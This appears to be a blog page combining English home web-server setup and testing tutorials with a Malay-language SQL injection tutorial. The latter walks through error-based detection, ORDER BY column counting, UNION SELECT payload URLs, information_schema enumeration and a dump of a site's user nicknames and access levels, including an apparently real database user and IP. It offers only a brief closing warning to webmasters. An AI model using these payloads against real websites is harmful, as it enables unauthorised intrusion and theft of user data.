Testing you home webserver

There are many method you choose to test your new home webserver. Read the rest of this post to find out how you can test you home webserver.


METHOD 1: Friends on The NET
I call this method Friends on the net because it rely 100% on your friends.

First, check your IP address. use whatismyipaddress.com

contact your friend and ask him/her to type your ip address in his/her favourite browser.

If you successfully create your server, he/she should see something. This depend on what you put in your root directory.

METHOD 2: Proxy Site
Again, check you Ip Address using the link above.

copy your ip address and go to your favourite proxy site. if you don't know what proxy site, read my post about proxy and some proxy script you can use

when you get to the proxy site, paste your iP address and then press Browse.


in this picture, i'm using hidemyipaddress.org

when you press browse, You should see the content of your root folder.

METHOD 3: WiFi YouR NeW Friend
if you have 2 or more computer with Wireless card install in it, you can setup Internet Connection Sharing so that all the computer can connect to internet using WiFi.

The host computer(the computer that you set-up as the home webserver) MUST have wireless card in order to start internet connection sharing.

double click your LAN icon in taskbar and click Properties. Then go to Advanced, select Allow....

see picture:


If you select the Wireless Connection, you wireless card will automatically get ip address, 192.168.0.1.

connect your other computer using wireless to the host.
fire-up your browser, then enter the host ip address, 192.168.0.1

again, if you done nothing wrong, you should see file in your root folder. i.e, the index file,

Configuring Your Router

Configuring your router is a simple task but different router give different on-screen interface. This, I can't give the specific location of where you should edit but i think it's the same for all router.

STEP 1
Open Up your favourite browser and go to you router configuration screen.

To get to the configuration screen, type 192.168.1.254 in the address bar.
** this is my router configuration screen (see Setting Up Home Webserver)

Here is some hint:
1. to check your router configuration address, double-click you Local Area Network (the two computer near the clock).

2. then go to support


3. Usually, you can type the Default Gateway as the address in your browser. That is usually the address of your router configuration screen.

STEP 2
Setting static IP Address for your computer.

If your ip address keep changing everytime you online, you can't put your server available to your friends or everyone on the net.

fill up your information when the browser ask for username and password.



If you provide correct information, you'll be redirected to screen similiar to this.
**of course, it depend on the type of router that you use.



Go to Interface Setup then click the LAN tab.



Fill up the setting according to the picture.
Keep in mind that

brouter Local Ip is according to your router configuration site address

mine is 192.168.1.254

Ip Subnet Mask is THE SAME AS IN THE PICTURE

For the DHCP SERVER, you can put any number as long as it is within your router local IP address.

see picture

if your ROUTER local IP address is 192.168.1.254, then you DHCP SERVER ip address is 192.168.1.11

only change the last 3-digit!!!

STEP 3
Forwarding traffic from internet to communicate with your server

everytime people from internet type in your IP address, there should be forwarded to your server.

To make it happen, go to Advanced Setup >> NAT. Forwarding ip Address to your service can be done from this location using the Virtual Server configuration.



Click the Virtual Server.



Add rule according to the application you want to use. In this case, HTTP_SERVER.

Select HTTP_Server from the list, then enter your IP Address.

IP address is the IP Address that you assign in DHCP SERVER.

PORT is automatically assign for you. Port for HTTP_SERVER is 80

In the picture i add FTP application but you don't have to add it if you don't have FTP Server.

Save your configuration.
DONE

READ the guide on: Testing Your Home Web Server

How to Host Website From Home

Before the age of Broadband technology, no one ever think of hosting their website from their own home. Nowadays, almost every houses using broadband to access the internet. Whats more, all broadband technology using router to communicate with the ISP and of course, to go oline. In this tutorial, i'll show you how to set up your home-based server. And, it's a PRIVATE plus FREE!!

Web Hosting using the same computer as you use at home. The only difference is, their has more space i.e has a few hundred TB space compared to yours, only a few GB. Their computer has more powerful RAM plus powerful processor and a high-speed internet.

basically, to setup your own home-based-server, you'll need this:

1. Server client
2. computer
3. 24/7 internet connection

that's it. if you have all of that, you are good to go.

In this tutorial, i'm using:
1. Windows XP SP2
2. Apache webserver 2.2.11
3. Billion Bipac 5112s router

STEP 1
Download Apache Webser 2.2.11 from http://httpd.apache.org/.

Download the one that meet the requirement of your computer.

STEP 2
Install the Apache webserver. Just proceed with the install and fill up what necessary information if it ask you any.

STEP 3
You Finish. You can test your webserver by going to http://localhost.

You should see something in your browser instead of blank paga (white page).

next step: Configuring Your Router

SQL Injection - tutorial

Sy buka topik ni coz kebanyaan webmaster di negara kita termasuk beberapa site dgn xtension GOV berpotensi untuk digodam oleh script-kiddie. klu H A C K e R yg advanced dn :twisted: mgkin da lama data2 yg enting tu da hilang. So, klu anda sorang webmaster, anda sepatutnya tahu mengenai SQLi ni.


PeNGENALAN

SQL adalah singkatan kepada Structured Query Language. SQL digunakan untuk berkomunikasi dengan database dlm sesuatu sistem (applikasi web). Beberapa database yang biasa digunakan adalah Oracle, MySQL, Sybase, Access, Ingres, dn byk lagi.

beberapa arahan yg standard untuk SQL ni seperti Select, Insert, Drop, Delete, Update, dan juga Create.


PeNGeNALAN KePADA SQLi (SQL INJeCTION)

SQLi adalah satu teknik dimana penggodam menggunakan kelemahan sistem itu sendiri dgn memasukkan arahan ke dalam Form Input ataupun dlm URL itu sendiri.

Kebanyakan SQLi dilakukan dlm URL sbb ia memberikan 'error yg spesel'.


APA YANG MeReKA BOLeH BuAT DeNGAN SQLi?

Data yg penting seperti password admin, password user, username, username admin, username superadmin, email, dn mcm2 lg.


setelah suma data ni abis dihisap oleh penggodam, kebanyakannya akan meletakkan backdoor pada sistem anda dgn menggunakan arahan Create, dan Insert.


Lebih sadis jika penggodam itu menghapuskan semua data dlm sistem anda dgn arahan Delete atau Drop.


CARA MeNGeTAHUI WeBSITe BOLEH DISeRANG DGN SQLi

contoh:

1. katakan anda menjumpai satu site dgn alamat seperti ni>


Quote:

http://www.contoh.com/index.php?id=89

2. untuk mengetahui jika site itu boled diserang dgn cara SQLi adalah sgt mudah. anda hanya perlu meletakkan ' di hujung url tersebut.

http://www.contoh.com/index.php?id=89'

3. jika anda mendapat pparan error seperti ni>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''tr'' AND nitDisplayFrom <=NOW() AND nitRemovalDate >NOW() AND nitDi' at line 5

We're sorry, the page you are looking for may have moved during the redesign of our site or no longer exists. Please return to the home page or use the search option for further information. You can contact us if you feel you have reached this page in error:

[spoiler]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 3[/spoiler]


atau anda mendapat halaman yg tidak lengkap seperti halaman yg kosong shj.


4. VOiLLa!! site tersebut boleh diserang dgn SQLi.


MeNGeTAHUI BILANGAN COLUMN

1. seblum anda dpt bergerak ke aktiviti seterusnya, anda harus tahu berapa byk bilangan column website tersebut.


2. masukkan arahan seperti ini:

http://www.contoh.com/index.php?id=89+ORDER+BY+1--

atau

http://www.contoh.com/index.php?id=89+ORDER+BY+1/*

atau

http://www.contoh.com/index.php?id=89+ORDER+BY+1#

3. seterusnya, tambahkan nilai 1 tersebut sehingga anda mendapat error seperti ini:

Unknown column '13' in 'order clause'

4. ini bermaksud, nilai column dlm website ni kurang dari 13

5. jika anda mendapat error ni, kurang nombor tersebur sehingga anda mendapat halaman yg normal.

6. contoh:

anda meletakkan nombor 13 pada url

http://www.contoh.com/index.php?id=89+ORDER+BY+13--

anda mendapat error

Unknown column '13' in 'order clause'

seterusnya anda meletakkan nombor 12 dlm URL

http://www.contoh.com/index.php?id=89+ORDER+BY+12--

anda mendapat halaman normal i.e: website to x kuarkan apa2 error


Bilangan column yg ada pada website ni adalah 12


COLUMN YANG BOLeH DISeRANG

column yang boleh diserang dgn SQLi boleh diketahui dgn arahan

AND 1=0 UNION SELECT ALL

AND 1=0 bermaksud, database tu akan sentiasa mentafsirkan arahan anda sebagai error


1. menentukan column yang bolh di serang dgn memasukkan arahan di atas pada URL

http://www.contoh.com/index.php?id=89+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,6,7,8,9,10,11,12--

atau

http://www.contoh.com/index.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--

arahan ini akan menunjukkan nombor column yang boleh diserang pada website tersebut.


contoh: sebaik sahaja anda meletakkan arahan tersebut, ada nombor yang keluar pada website tersebut.




dari sini, kita dpt kenal pasti bahawa column yang boleh diserang adalah column 1,2,3, dan 4


MeNGeTAHUI VeRSI DATABASe

sekarang kita boleh mengetahui versi database tersebut dgn memasukkan arahan pada column yang boleh diserang td.


arahan:

@@version

version()

concat_ws(0x3a,version(),user(),database()) <-- advanced

kita akan memasukkan salah sati arahan di atas pda column yg vuln td. (contoh: sy gnkn column nombor 2)

http://www.contoh.com/index.php?id=89+AND+1=0+UNION+SELECT+ALL+1,@@version,3,4,5,6,7,8,9,10,11,12--

http://www.contoh.com/index.php?id=89+AND+1=0+UNION+SELECT+ALL+1,version(),3,4,5,6,7,8,9,10,11,12--

http://www.contoh.com/index.php?id=89+AND+1=0+UNION+SELECT+ALL+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12--

dari sini, kita dpt tahu:

Versi: 5.0.81

User: yaumh@202.190.197.138

Database: penang

SQL 4 vs SQL 5

tutorial ini hanya melibat website yang mengunakan SQL versi 5. dlm SQL 4, database dinamakan sendiri oleh webmaster. nama2 ini juga tidak dikumpulkan dlm stu pusat seperti SQL 5 yang menggunakan konsep information_schema.


Untuk melihat semua database dlm SQL 5, kita gnkan arahan

group_concat(schema_name) ... from information_schema.schemata

contoh:

http://www.contoh.com/index.php?id=89+ALL+1=0+UNION+SELECT+ALL+1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.SCHEMATA--

database yg ada:

information_schema

kuching

msiahelp

penang

MeNCARI NAMA TABLe

selepas kita dpt nama database, seterusnya kita boleh mendapat nama table yg ada dlm database tersebut.

group_concat(table_name)..+from+information_schema.tables+where+table_schema=database()

contoh:

http://www.contoh.com/index.php?id=89+ALL+1=0+UNION+SELECT+ALL+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--

table yg ada dlm database()

chanstats

comments

monitor

news

people

profiles

quotes

userstats

vote

MeNDAPATKAN NAMA COLUMN DALAm TABLe


cara mendapat nama colum dalam suatu table adalah dgn menggunakan arahan

group_concat(column_name)...+from+information_schema.columns+where+table_name=***nama table**--

contoh: sy gnakan table> people

http://www.contoh.com/index.php?id=89+ALL+1=0+UNION+SELECT+ALL+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='people'--

oppss.. dpt error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'people\'--' at line 3

cara yg betul adalah menukarkan people kepada hexadecimal. (download encoder tool>http://www.megaupload.com/?d=FGFMN7NV)


jd,


people menjadi 0x70656F706C65


seterusnya tkar people dgn hex tersebut dlm URL

http://www.contoh.com/index.php?id=89+ALL+1=0+UNION+SELECT+ALL+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x70656F706C65--

Voilla!!


column yg ada

id

nickname

category

access

MiNiNG DATA

kita tahu nama database, nama table, dan juga nama column. seterunya kita boleh melihat semua data dalam column yg kita kehendaki.

group_concat(***nama column)...+from+**nama table

contoh: nama table: people nama column:id nickname category access

(sy hya akn gn column: nicname dn access)

http://www.contoh.com/index.php?id=89+ALL+1=0+UNION+SELECT+ALL+1,group_concat(nickname,0x3a,access),3,4,5,6,7,8,9,10,11,12+FROM+people--

(sy tukar ke column 3 coz t'lalu besar)

see.. username utk site ni. Nama ko pun ada jg x? haha

username Access

Gawd 3

Kidz 2

Fully_Alive 2

Isaac:1,Kelv 1

cHoChObO 1

girl^_19 1

TcK:2,mandytmm 1

sojai6 1

Micintosh 1

HanzZ 1

bash 2

Fionna 1

Resists 1

Darknet 1

^-^ 3

soon^_^ 1

Oraculum 1

dolly^o^liss 1

esprit 1

yushi 1

rlinux 1

minicompo 1

V^v|aN 1

Card|naL 1


dgn cara cmni je, satu website tu boleh dihancurkan. So, hati2 bila membangunkan website. Sentiasa backup data dan gn ENCRYPTION terutama utk password dan username.